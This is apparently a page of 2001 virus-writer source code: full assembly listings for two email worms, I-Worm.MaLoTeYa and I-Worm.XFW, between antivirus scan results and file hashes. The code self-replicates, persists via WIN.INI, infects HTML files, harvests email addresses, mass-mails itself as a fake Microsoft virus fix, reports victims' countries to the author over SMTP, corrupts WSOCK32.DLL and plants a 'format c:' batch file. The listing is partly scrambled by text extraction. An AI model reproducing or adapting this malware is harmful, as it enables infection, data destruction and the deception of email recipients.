2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.Win32.Petik!IK Win32/Peti Worm/Petik.13 Worm/Win32.Win32 W32/Petik.B@mm Win32:Petik-Bush I-Worm/Petik Win32.Pettick.E@mm I-Worm.Petik Worm.Win32.Petik.AA Win32.Petik.9216 Win32/Petik.8192.A W32/Petik.B@mm Email-Worm.Win32.Petik W32/Petik.B@mm Win32.Pettick.E@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm:Win32/Petick.E@mm Win32/Petik.AA W32/Petik.O W32/Petik.W.worm I-Worm.Petgwb.A Worm.Mail.Petik.b W32/Bush BehavesLike.Win32.Malware (v) W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.E Win32.Worm.Petik.8192 I-Worm.Petgwb.A

Additional information File size: 9216 bytes MD5...: 1defedea5174374180d660693622fb90 SHA1..: f8047ed4d150dfd6ae9e8fd5cd6146c960570f1b

comment # Name : I-Worm.MaLoTeYa Author : PetiK Date : July 2nd - July 6th Size : 12288 byte Action: It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE. It alters the run= line and creates the VARegistered.htm file in the StartUp folder. This file send some informations to petik@multimania.com and displays a fake message. If the version of the platform is Windows 95/98, the file is a service process. It infects all *.htm and *.html file while writing at the end a VB script. It checks after if exist a internet connection and scans all *.htm* files in the "Temporary Internet Files" to find some EMail addreses and send a copy of itself. The worms sends equally an email to "petik@multimania.com" with the country of the user. When the user want to see the system properties, the title of the window is changed by "PetiK always is with you :-)". Greets to Benny, ZeMacroKiller98, Mandragore. tasm32 /M /ML Maloteya tlink32 -Tpe -aa -x Maloteya,,,import32 # .586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc ;---------------------------------------;Installation of the worm in the computer ;---------------------------------------DEBUT: VERIF: push 00h callx GetModuleFileNameA push 50h push offset szOrig push eax callx GetModuleFileNameA push 50h push offset szCopie callx GetWindowsDirectoryA @pushsz "\RUNW32.EXE" push offset szCopie callx lstrcat push 50h push offset szCopb callx GetSystemDirectoryA @pushsz "\MSVA.EXE" push offset szCopb callx lstrcat push push callx test jz COPIE: push push callx push push push callx WININI: offset szOrig offset szCopie lstrcmp eax,eax CACHE push 00h offset szCopie offset szOrig CopyFileA 00h offset szCopb offset szOrig CopyFileA push 50

push offset szWinini callx GetWindowsDirectoryA @pushsz "\\WIN.INI" push offset szWinini callx lstrcat push offset szWinini push offset szCopie @pushsz "run" @pushsz "windows" callx WritePrivateProfileStringA ;-------------------------------------------------;Create VARegistered.htm file in the StartUp folder ;-------------------------------------------------C_GET: @pushsz "SHELL32.dll" callx LoadLibraryA mov SHELLhdl,eax @pushsz "SHGetSpecialFolderPathA" push SHELLhdl callx GetProcAddress mov getfolder,eax push 00h push 07h ; STARTUP Folder push offset StartUp push 00h call [getfolder] test eax,eax je F_HTM @pushsz "\VARegistered.htm" push offset StartUp callx lstrcat HTM: push push push push push push push callx mov push push push push push callx push callx F_HTM: callx 00h 80h 02h 00h 01h 40000000h offset StartUp CreateFileA [FileHdl],eax 00h offset octets HTMTAILLE offset htmd [FileHdl] WriteFile [FileHdl] CloseHandle push [SHELLhdl] FreeLibrary

F_MESS: push 1000 callx Sleep push 1040h @pushsz "Microsoft Virus Alert" @pushsz "Your system does not appear infected with I-Worm.Magistr" push 00h callx MessageBoxA jmp FIN ;---------------------------------;Serivice process for Windows 95/98 ;---------------------------------CACHE: @pushsz "KERMEL32.dll" callx GetModuleHandleA @pushsz "RegisterServiceProcess" push eax callx GetProcAddress xchg ecx,eax jecxz D_INF push 01h push 00h call ecx D_INF: push 50 push offset szCurrent callx GetCurrentDirectoryA

push offset szCurrent callx SetCurrentDirectoryA ;--------------------------------------------;Infect all *.htm* files of the Windows folder ;--------------------------------------------FFF: push offset Search @pushsz "*.htm*" ; Search some *.htm* files... callx FindFirstFileA inc eax je F_INF dec eax mov [htmlHdl],eax i_file: push push callx test jne push callx F_INF: call infect ; and infect them

offset Search [htmlHdl] FindNextFileA eax,eax i_file [htmlHdl] FindClose

;----------------------; Check if we r conected ;----------------------NET1: @pushsz "WININET.dll" callx LoadLibraryA test eax,eax jz FIN mov WNEThdl,eax @pushsz "InternetGetConnectedState" push WNEThdl callx GetProcAddress test eax,eax jz FIN mov netcheck,eax jmp NET2 NET2: push 00h push offset Temp call [netcheck] ; Connect to Internet ?? dec eax jnz NET2 FINNET: push [WNEThdl] callx FreeLibrary PAYS: push 50 push offset szSystemini callx GetWindowsDirectoryA @pushsz "\Win.ini" push offset szSystemini callx lstrcat push offset szSystemini push 20 push offset org_pays push offset Default @pushsz "sCountry" @pushsz "intl" callx GetPrivateProfileStringA ;-----------------------------------------------------------------; Send the name of country to "petik@multomania.com" (perhaps bugs) ;-----------------------------------------------------------------SMTP: push offset WSA_Data ; Winsock push 0101h ; ver 1.1 (W95+) callx WSAStartup or eax,eax jnz INIT @pushsz "obelisk.mpt.com.uk" callx gethostbyname xchg ecx,eax jecxz FREE_WIN mov esi,[ecx+12] lodsd push eax ; convert SMTP Name to an IP address ; Error ? ; Fetch IP address

pop push push push callx mov inc jz

[ServIP] 00h 01h 02h socket work_socket,eax eax FREE_WIN ; Create Socket ; SOCK_STREAM ; AF_INET

push 16 call @1 dw 2 db 0, 25 ServIP dd 0 db 8 dup(0) @1: push [work_socket] callx connect inc eax jz CLOSE_SOC lea mov esi,Send_M bl,6 xor

; Sze of connect strucure ; Connect structure ; Family ; Port number ; IP of server ; Unused

Command_Loop: call @2 Time_Out: dd 5 dd 0 @2: push eax push eax call @3 Socket_Set: dd 1 work_socket dd 0 @3: push eax callx select dec eax jnz CLOSE_SOC push push push push callx xchg jecxz inc jz or jz mov

eax,eax ; Time-out: ; Seconds ; Milliseconds ; Not used (Error) ; Not used (Writeability) ; Socket count ; Socket ; Unused

00h 512 offset buf_recv [work_socket] recv ecx,eax CLOSE_SOC ecx CLOSE_SOC ebx,ebx CLOSE_SOC al,'2'

; Received data from socket

; Connection closed ? ; Error ? ; Received stuff was QUIT ; reply ? then close up. ; "OK" reply ; Received stuff was the DATA ; reply ?

cmp bl,2 jne Check_Reply inc eax Check_Reply: scasb je Wait_Ready lea mov esi,Send_M + (5*4) bl,1

Wait_Ready: xor ecx,ecx lea eax,Time_Out push eax push ecx lea eax,Socket_Set push eax push ecx push ecx callx select dec eax jnz CLOSE_SOC cld

; not used (Error) ; Writeability ; Not used (Readability) ; Unused ; Time-ouit ??

lodsd movzx ecx,ax shr eax,16 add eax,ebp push push push push push callx pop cmp jne dec jns ecx 00h ecx eax [work_socket] send ecx eax,ecx CLOSE_SOC ebx Command_Loop ; Send command and data to the socket ; Size of buffer ; Buffer

CLOSE_SOC: push [work_socket] callx closesocket FREE_WIN: callx WSACleanup INIT: @pushsz "MAPI32.dll" callx LoadLibraryA test eax,eax jz FIN mov MAPIhdl,eax @pushsz "MAPISendMail" push MAPIhdl callx GetProcAddress test eax,eax jz FIN mov sendmail,eax D_GET: @pushsz "SHELL32.dll" callx LoadLibraryA mov SHELLhdl,eax @pushsz "SHGetSpecialFolderPathA" push SHELLhdl callx GetProcAddress mov getfolder,eax push 00h push 20h ; MSIE Cache Folder push offset Cache push 00h call [getfolder] push [SHELLhdl] callx FreeLibrary push offset Cache callx SetCurrentDirectoryA ;----------------------------------------------------------; Search email addresses into the "Temporary Internet Files" ;----------------------------------------------------------FFF2: push offset Search @pushsz "*.htm*" callx FindFirstFileA inc eax je END_SPREAD dec eax mov [htmlHdl],eax i_htm: push push callx test jne push callx call infect2

offset Search [htmlHdl] FindNextFileA eax,eax i_file [htmlHdl] FindClose

END_SPREAD: push [MAPIhdl] callx FreeLibrary

;--------------------------------------------------------------; Changes the title of the System Properties window on Wednesday ;--------------------------------------------------------------DATE: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDayOfWeek],3 jne FIN WIN1: @pushsz "Propriétés Systême" push 00h callx FindWindowA test eax,eax jz WIN2 jmp WIN3 WIN2: @pushsz "System Properties" ; Change title some windows push 00h callx FindWindowA test eax,eax jz WIN1 WIN3: mov edi,eax @pushsz "PetiK always is with you :-)" push edi callx SetWindowTextA jmp WIN1 FIN: push 00h callx ExitProcess

infect: pushad mov esi,offset Search.cFileName push esi callx GetFileAttributesA cmp eax,1 je end_infect push 00h push 80h push 03h push 00h push 01h push 40000000h push esi callx CreateFileA xchg eax,edi inc edi je end_infect dec edi push 02h push 00h push [Dist] push edi callx SetFilePointer push 00h push offset octets push HTMSIZE push offset d_htm push edi callx WriteFile push edi callx CloseHandle push 01h push esi callx SetFileAttributesA end_infect: popad ret infect2:pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset Search.cFileName inc eax je END_SPREAD dec eax xchg eax,ebx

; FILE_END

; READONLY

xor push push push push push push callx test je xchg xor push push push push push callx test je xchg push push callx xchg jecxz

eax,eax eax eax eax 02h eax ebx CreateFileMappingA eax,eax F1 eax,ebp eax,eax eax eax eax 04h ebp MapViewOfFile eax,eax F2 eax,esi 00h ebx GetFileSize eax,ecx F3

; PAGE_READONLY

; FILE_MAP_READ

d_scan_mail: call @melto db 'mailto:' @melto: pop edi scn_mail: pushad push 07h pop ecx rep cmpsb popad je scan_mail inc esi loop scn_mail F3: F2: F1: push callx push callx push callx popad ret esi UnmapViewOfFile ebp CloseHandle ebx CloseHandle

scan_mail: xor add mov push p_car: cmp je cmp je cmp je cmp jne inc not_a: jmp car_s: jmp car_f: stosb pop test je call jmp

edx,edx esi,7 edi,offset m_addr edi lodsb al,' ' car_s al,'"' car_f al,'''' car_f al,'@' not_a edx stosb p_car inc esi p_car xor al,al edi edx,edx d_scan_mail ENVOIE d_scan_mail

; size of the string "mailto:" ; next character ; space ?? ; end character ?? ; end character ?? ; @ character ??

; jmp to nxt char

; exist @ ??

ENVOIE: push push push push push call ret

xor eax,eax eax eax offset Message eax [MAPIh] [sendmail]

.data namer db 50 dup (0) szCopb db 50 dup (0) szCopie db 50 dup (0) szCurrent db 50 dup (0) szOrig db 50 dup (0) szSystemini db 50 dup (0) szWinini db 50 dup (0) Cache db 70 dup (0) StartUp db 70 dup (0) m_addr db 128 dup (?) WSA_Data db 400 dup (0) buf_recv db 512 dup (0) Default db 0 FileHdl dd ? octets dd ? netcheck dd ? sendmail dd ? getfolder dd ? htmlHdl dd ? MAPIhdl dd ? SHELLhdl dd ? WNEThdl dd ? RegHdl dd ? Dist dd 0 Temp dd 0 MAPIh dd 0 WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h Origine db "Made In France",00h

Message dd dd dd dd dd dd dd dd dd dd dd MsgFrom dd dd dd dd dd MsgTo dd dd dd dd dd dd dd dd dd dd dd dd

dd ? offset sujet offset corps ? offset date ? 2 offset MsgFrom 1 offset MsgTo 1 offset AttachDesc dd ? ? offset NameFrom offset MailFrom ? ? ? 1 offset NameTo offset m_addr ? ?

; MAPI_RECEIPT_REQUESTED ?? ; MAPI_UNREAD ??

; MAIL_TO

AttachDesc

? ? ? ; character in text to be replaced by attachment offset szCopb ; Full path name of attachment file ? ?

sujet

db "New Virus Alert !!",00h

corps date NameFrom MailFrom NameTo Send_M:

db db db db db db

"This is a fix against I-Worm.Magistr.",0dh,0ah "Run the attached file (MSVA.EXE) to detect, repair and " "protect you against this malicious worm.",00h "2001/07/01 15:15",00h ; YYYY/MM//DD HH:MM "Microsoft Virus Alert" "virus_alert@microsoft.com",00h db "Customer",00h dw fHELO-dHELO fFROM-dFROM fRCPT-dRCPT fDATA-dDATA fMAIL-dMAIL fQUIT-dQUIT

dw dw dw dw dw

dHELO db 'HELO obelisk.mpt.com.uk',0dh,0ah fHELO: dFROM db 'MAIL FROM:<maloteya@petik.com>',0dh,0ah fFROM: dRCPT db 'RCPT TO:<petik@multimania.com>',0dh,0ah fRCPT: dDATA db 'DATA',0dh,0ah fDATA: dMAIL: db 'From: "MaLoTeYa",<maloteya@petik.com>',0dh,0ah db 'Subject: Long Live the Worm',0dh,0ah db 'Pays d''origine : ' org_pays db 20 dup (0) db '',0dh,0ah db '.',0dh,0ah fMAIL: dQUIT db 'QUIT',0dh,0ah fQUIT: htmd: db "<html><head><title>Virus Alert Registration</title></head>",0dh,0ah db "<SCRIPT LANGUAGE=""VBScript"">",0dh,0ah db "Sub control",0dh,0ah db "dim i",0dh,0ah db "dim caract",0dh,0ah db "formu.action=""""",0dh,0ah db "If formu.mail.value="""" Then",0dh,0ah db " MsgBox ""Forgotten EMail""",0dh,0ah db " Else",0dh,0ah db " For i= 1 to len(formu.mail.value)",0dh,0ah db " caract=mid(formu.mail.value,i,1)",0dh,0ah db " If caract=""@"" Then",0dh,0ah db " Exit For",0dh,0ah db " End If",0dh,0ah db " Next",0dh,0ah db " If caract=""@"" Then",0dh,0ah db " formu.action=""mailto:petik@multimania.com""",0dh,0ah db " Else",0dh,0ah db " MsgBox ""Invalid EMail""",0dh,0ah db " End If",0dh,0ah db "End If",0dh,0ah db "End Sub",0dh,0ah db "</SCRIPT>",0dh,0ah db "<body bgcolor=white text=black>",0dh,0ah db "<p align=""center""><font size=""5"">Microsoft Virus Alert Registration</font></p>",0dh,0ah db "<p align=""left""><font size=""3"">Please fill out this form. </font>",0dh,0ah db "<font>You must be connected to internet.</font></p>",0dh,0ah db "<p></p>",0dh,0ah db "<form name=""formu"" action method=""POST"" enctype=""text/plan"">",0dh,0ah db "<p>Name : <input name=""nom"" type=""TEXT"" size=""40""></p>",0dh,0ah db "<p>Firstname : <input name=""prenom"" type=""TEXT"" size=""40""></p>",0dh,0ah db "<p>City : <input name=""ville"" type=""TEXT"" size=""40""></p>",0dh,0ah db "<p>Country : <input name=""pays"" type=""TEXT"" size=""40""></p>",0dh,0ah db "<p>E-Mail : <input name=""mail"" type=""TEXT"" size=""40""></p>",0dh,0ah db "<p><input type=""submit"" value=""Submit"" name=""B1"" onclick=""control""></p>",0dh,0ah db "<p></p>",0dh,0ah db "<p align=""center""><font><B>AFTER REGISTRATION YOU CAN DELETE THIS FILE</B></font></p>",0dh,0ah db "</form></body></html>",00h HTMTAILLE equ $-htmd d_htm: db "",0dh,0ah,0dh,0ah db "<SCRIPT Language=VBScript>",0dh,0ah

db "On Error Resume Next",0dh,0ah db "Set fso=CreateObject(""Scripting.FileSystemObject"")",0dh,0ah db "Set ws=CreateObject(""WScript.Shell"")",0dh,0ah db "ws.RegWrite ""HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"",""http://www.petikvx.fr.fm""",0dh,0ah db "document.Write ""<font face='verdana' color=red size='2'>This file is infected by my new virus" db "<br>Written by PetiK (c)2001" db "<br>HTML/W32.MaLoTeYa.Worm<br></font>""",0dh,0ah db "</SCRIPT>",0dh,0ah HTMSIZE equ $-d_htm OSVERSIONINFO struct dwOSVersionInfoSize dd dwMajorVersion dd dwMinorVersion dd dwBuildNumber dd dwPlatformId dd szCSDVersion db OSVERSIONINFO ends SYSTIME wYear wMonth wDayOfWeek wDay wHour wMinute wSecond wMillisecond SYSTIME MAX_PATH equ 260 struct dd ? dd ? ends ? ? ? ? ? 128 dup (?)

struct WORD ? WORD ? WORD ? WORD ? WORD ? WORD ? WORD ? WORD ? ends

FILETIME dwLowDateTime dwHighDateTime FILETIME

WIN32_FIND_DATA struct dwFileAttributes dd ? ftCreationTime FILETIME ? ftLastAccessTime FILETIME ? ftLastWriteTime FILETIME ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved0 dd ? dwReserved1 dd ? cFileName dd MAX_PATH (?) cAlternateFileName db 13 dup (?) db 3 dup (?) WIN32_FIND_DATA ends OSVer SystemTime Search end DEBUT end OSVERSIONINFO <> SYSTIME <> WIN32_FIND_DATA <>

File Maloteya.exe received on 05.16.2009 17:52:03 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.16 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.16 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.16 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.16 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.737 2009.05.16 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.16 PCTools 4.4.2.0 2009.05.16 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.16 Additional information File size: 12288 bytes MD5...: eb7bea183626119bc54c4ab1de80c606 SHA1..: 1f022ad7156e8d510168b7ba441afeb966edb828

Result Email-Worm.Win32.Petik!IK Win32/PetTick.12288 Worm/Petik.4 Worm/Win32.Win32 W32/Malware!8c02 Win32:Petik-Maloteya I-Worm/Petik.D Win32.Matoleya.A@mm W32.Petik Worm.Petik-1 Worm.Win32.Petik.F Win32.Petik.12288 Win32/Petik.12288 W32/Malware!8c02 Email-Worm.Win32.Petik W32/Sabak.A!worm.im Win32.Matoleya.A@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.4 Worm:Win32/Pet_tik.E@mm Win32/Petik.F W32/Pet_Tick.12288.A W32/Petik.F VBS.Petik.F Medium Risk Malware Worm.Mail.Petik.q W32/Petik-E BehavesLike.Win32.Malware (v) W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.G Win32.Worm.Petik.12288 I-Worm.Win32.PetTick.12288 VBS.Petik.F

comment # Name : I-Worm.XFW (Extra French Worm) Author : PetiK Date : July 10th - August 3th Size : 5632 byte (compressed with UPX) Action: It copies itself to \SYSTEM\Services.exe. It adds a value in the run services key : "Run Services"="\SYSTEM\Services.exe". It alters the "run=" lines int he WIN.INI file. It copies the file WSOCK32.DLL by WSOCK32.PTK and alters the original file while add "PetiK" in the file.It displays a message and create a \WINDOWS\Tool_PetiK.txt. This file explains how repair WSOCK32.DLL. If the worm is located in the \SYSTEM folder, it searches all DLL files in the current folder (SYSTEM here) and copies them by the worm while add the ".EXE" extention. FILE.DLL ==>> FILE.DLL.EXE It creates at the end if the computer is connected a VBS file to spread with Outlook. To delete : ren del del del del del del \WINDOWS\SYSTEM\Wsock32.dll \WINDOWS\SYSTEM\Wsock32.ptk \WINDOWS\SYSTEM\Wsock32.dll \WINDOWS\SYSTEM\Services.exe \WINDOWS\SYSTEM\*.dll.exe \WINDOWS\Tool_PetiK.txt in the WIN.INI file after run= C:\.vbs

tasm32 /M /ML XFW.asm tlink32 -Tpe -aa -x XFW.obj,,,import32 upx -9 XFW.exe # .586p .model flat .code ;JUMPS callx macro a extrn a:proc call a endm include useful.inc DEBUT: VERIF: callx push push push callx jmp INET push 00h GetModuleHandleA 50h offset szOrig eax GetModuleFileNameA

push 50h push offset szCopie callx GetSystemDirectoryA @pushsz "\SERVICES.EXE" push offset szCopie callx lstrcat push push callx test jz COPIE: push push callx W_INI: push offset szOrig offset szCopie lstrcmp eax,eax INF_DLL push 00h offset szCopie offset szOrig CopyFileA push 50 offset Winini

; copy to \SYSTEM\Services.exe

callx GetWindowsDirectoryA @pushsz "\\WIN.INI" push offset Winini callx lstrcat push offset Winini push offset szCopie @pushsz "run" @pushsz "windows" callx WritePrivateProfileStringA WSOCK: mov push callx test jz add mov stosd mov stosd mov stosd xor stosd push push callx mov push callx add sub mov push push push callx test jz xor push push push push push push push callx inc jz dec mov xor push push push push push push callx test jz mov xor push push push push push callx test jz push 50 edi,offset a_wsck edi GetSystemDirectoryA eax,eax FIN edi,eax eax,"OSW\" eax,"23KC" eax,"LLD." eax,eax ; serach \SYSTEM\Wsock32.dll offset a_wsck offset n_wsck lstrcat esi,offset n_wsck esi lstrlen esi,eax esi,4 [esi],"KTP." 01h offset n_wsck offset a_wsck CopyFileA eax,eax FIN eax,eax eax eax 03h eax eax 80000000h or 40000000h offset a_wsck CreateFileA eax FIN eax WsckHdl,eax eax,eax eax eax eax 04h eax WsckHdl CreateFileMappingA eax,eax FIN2 WsckMap,eax eax,eax eax eax eax 06h WsckMap MapViewOfFile eax,eax FIN3

; to become \SYSTEM\Wsock32 ; and \SYSTEM\Wsock32.ptk

; PAGE_READWRITE

; SECTION_MAP_WRITE or READ

mov mov cmp je mov mov mov FIN4: push callx FIN3: push callx FIN2: push callx

WsckView,eax esi,eax byte ptr FIN3 word ptr word ptr byte ptr [esi+12h],"P" [esi+12h],"eP" [esi+14h],"it" [esi+16h],"K"

WsckView UnmapViewOfFile WsckMap CloseHandle WsckHdl CloseHandle

F_MESS: push 10h @pushsz "Loader Error" @pushsz "This program will be terminated" push 00h callx MessageBoxA TOOLS: pushad push 50 push offset windir callx GetWindowsDirectoryA @pushsz "\Tool_PetiK.txt" push offset windir callx lstrcat push 00h push 01h or 20h push 02h push 00h push 01h push 40000000h push offset windir callx CreateFileA mov edi,eax push 00h push offset octets push TXTSIZE push offset txtd push edi callx WriteFile push edi callx CloseHandle popad jmp FIN INF_DLL: D_INF: push 50 push offset szCurFolder callx GetCurrentDirectoryA push offset szCurFolder callx SetCurrentDirectoryA FFF: push offset Search @pushsz "*.dll" callx FindFirstFileA inc eax je F_INF dec eax mov [htmlHdl],eax i_file: pushad mov edi,offset Search.cFileName push edi callx lstrlen add edi,eax mov eax,"EXE." stosd xor eax,eax stosd push 01h push offset Search.cFileName push offset szOrig callx CopyFileA test eax,eax jz S_P push offset Search

; search all DLL files

; and add .EXE => file.dll.exe

; and copies with the main worm

push callx test jne FC: push callx popad F_INF: S_P:

[htmlHdl] FindNextFileA eax,eax i_file [htmlHdl] FindClose

push offset RegHandle push 01h push 00h @pushsz "Software\Microsoft\Internet Explorer\Main" push 80000001h callx RegOpenKeyExA test eax,eax jnz FIN push offset PageSize push offset Page push offset ValueType push 00h @pushsz "Start Page" push RegHandle callx RegQueryValueExA push [RegHandle] callx RegCloseKey @pushsz "http://www.whitesonly.net" push offset Page callx lstrcmp test eax,eax jz FORMAT @pushsz "http://www.kkk.com" push offset Page callx lstrcmp test eax,eax jz FORMAT @pushsz "http://www.front-national.fr" push offset Page callx lstrcmp test eax,eax jz FORMAT @pushsz "http://www.lepen-tv.com" push offset Page callx lstrcmp test eax,eax jz FORMAT @pushsz "http://www.hammerskins.com" push offset Page callx lstrcmp test eax,eax jz FORMAT jmp INET

FORMAT: pushad push 00h push 20h push 02h push 00h push 01h push 40000000h @pushsz "C:\Autoexec.bat" callx CreateFileA mov edi,eax push 00h push offset octets push BATSIZE push offset batd push edi callx WriteFile push edi callx CloseHandle popad jmp FIN INET: @pushsz "WININET.dll" callx LoadLibraryA test eax,eax

jz FIN mov WNEThdl,eax @pushsz "InternetCheckConnectionA" push WNEThdl callx GetProcAddress test eax,eax jz FIN mov netcheck,eax VNET: xor eax,eax push eax push eax push eax call [netcheck] xchg eax,ecx jecxz VNET FNET: push [WNEThdl] callx FreeLibrary push 40h @pushsz "Internet" @pushsz "You're connected" push 00h callx MessageBoxA VBS: pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\Win.vbs" callx CreateFileA mov edi,eax push 00h push offset octets2 push VBSSIZE push offset vbsd push edi callx WriteFile push edi callx CloseHandle popad push 01h @pushsz "wscript C:\Win.vbs" callx WinExec push 30 * 1000 @pushsz "C:\Win.vbs" callx DeleteFileA push 00h callx ExitProcess

FIN:

.data ; ========== INSTALLATION ========== a_wsck db 50 dup (0) n_wsck db 50 dup (0) szCopie db 50 dup (0) szOrig db 50 dup (0) Winini db 50 dup (0) windir db 50 dup (0) octets dd ? ; ============ INFECTION 1 =========== WsckHdl dd ? filesize dd ? WsckMap dd ? WsckView dd ? ; ============ INFECTION 2 =========== htmlHdl dd ? szCurFolder db 50 dup (0) ; =============== EMail ============== RegHandle dd ? Page db 7Fh dup (0) PageSize dd 7Fh

ValueType WNEThdl netcheck octets2 WormName Origine txtd

dd 0 dd ? dd ? dd ? db "I-Worm.XFW coded by PetiK (c)2001 " db "Made In France",00h

db "To restore Wsock32.dll :",13,10 db "extract /a D:\WIN98\precopy1.cab wsock32.dll /L C:\WINDOWS\SYSTEM",00h TXTSIZE equ $-txtd db "echo y | format c: /U /V:FuckYou" BATSIZE equ $-batd ? WORD ? ? ? WORD WORD WORD

batd

SYSTIME struct wYear WORD wMonth wDayOfWeek WORD wDay WORD wHour WORD wMinute wSecond wMillisecond SYSTIME ends MAX_PATH equ 260

?

? ? ?

FILETIME struct dwLowDateTime dd ? dwHighDateTime dd ? FILETIME ends WIN32_FIND_DATA struct dwFileAttributes dd ? ftCreationTime FILETIME ? ftLastAccessTime FILETIME ? ftLastWriteTime FILETIME ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved0 dd ? dwReserved1 dd ? cFileName dd MAX_PATH (?) cAlternateFileName db 13 dup (?) db 3 dup (?) WIN32_FIND_DATA ends SystemTime Search SYSTIME <> WIN32_FIND_DATA <>

vbsd: db 'Set K = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah db 'Set N = K.CreateItem(0)',0dh,0ah db 'N.To = P.Address',0dh,0ah db 'N.Subject = "Xtra game for you"',0dh,0ah db 'N.Body = "This is for you"',0dh,0ah db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"Services.exe")',0dh,0ah db 'N.DeleteAfterSubmit = True',0dh,0ah db 'If N.To <> "" Then',0dh,0ah db 'N.Send',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah VBSSIZE equ $-vbsd end DEBUT end

File XFW.exe received on 05.16.2009 20:03:58 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result VBS.Lee.Based!IK Win32/PetTick.5632 Worm/Petik.D1 Worm/Win32.Win32 W32/Malware!e65e Win32:XFW I-Worm/Petik Generic.Malware.Msp!.D18236D7 Worm.Petik.D2 Worm.Win32.Petik.AB Win32.Petik.8192 Suspicious File Win32/Petik.5632.C!intended W32/Malware!e65e Email-Worm.Win32.Petik W32/Petik!worm Generic.Malware.Msp!.D18236D7 VBS.Lee.Based Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!CA27691BF213 Worm.Petik.D1 Worm:Win32/Pet_tik.F Win32/Petik.AB W32/Petik.AC Worm/W32.Petik.5632 W32/Petik.D I-Worm.Petxfw.A Medium Risk Malware Worm.XFW W32/XfW Worm.Petik W95.Pet_Tick.gen WORM_PETIK.F Win32.Worm.Petik.8192 I-Worm.Win32.PetTick.5632 I-Worm.Petxfw.A

Additional information File size: 5632 bytes MD5...: ca27691bf2137dc610588dd9f09de3b2 SHA1..: 5b1aac1f8783d4123f3b88c213bc8321dc8d6a4a PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser
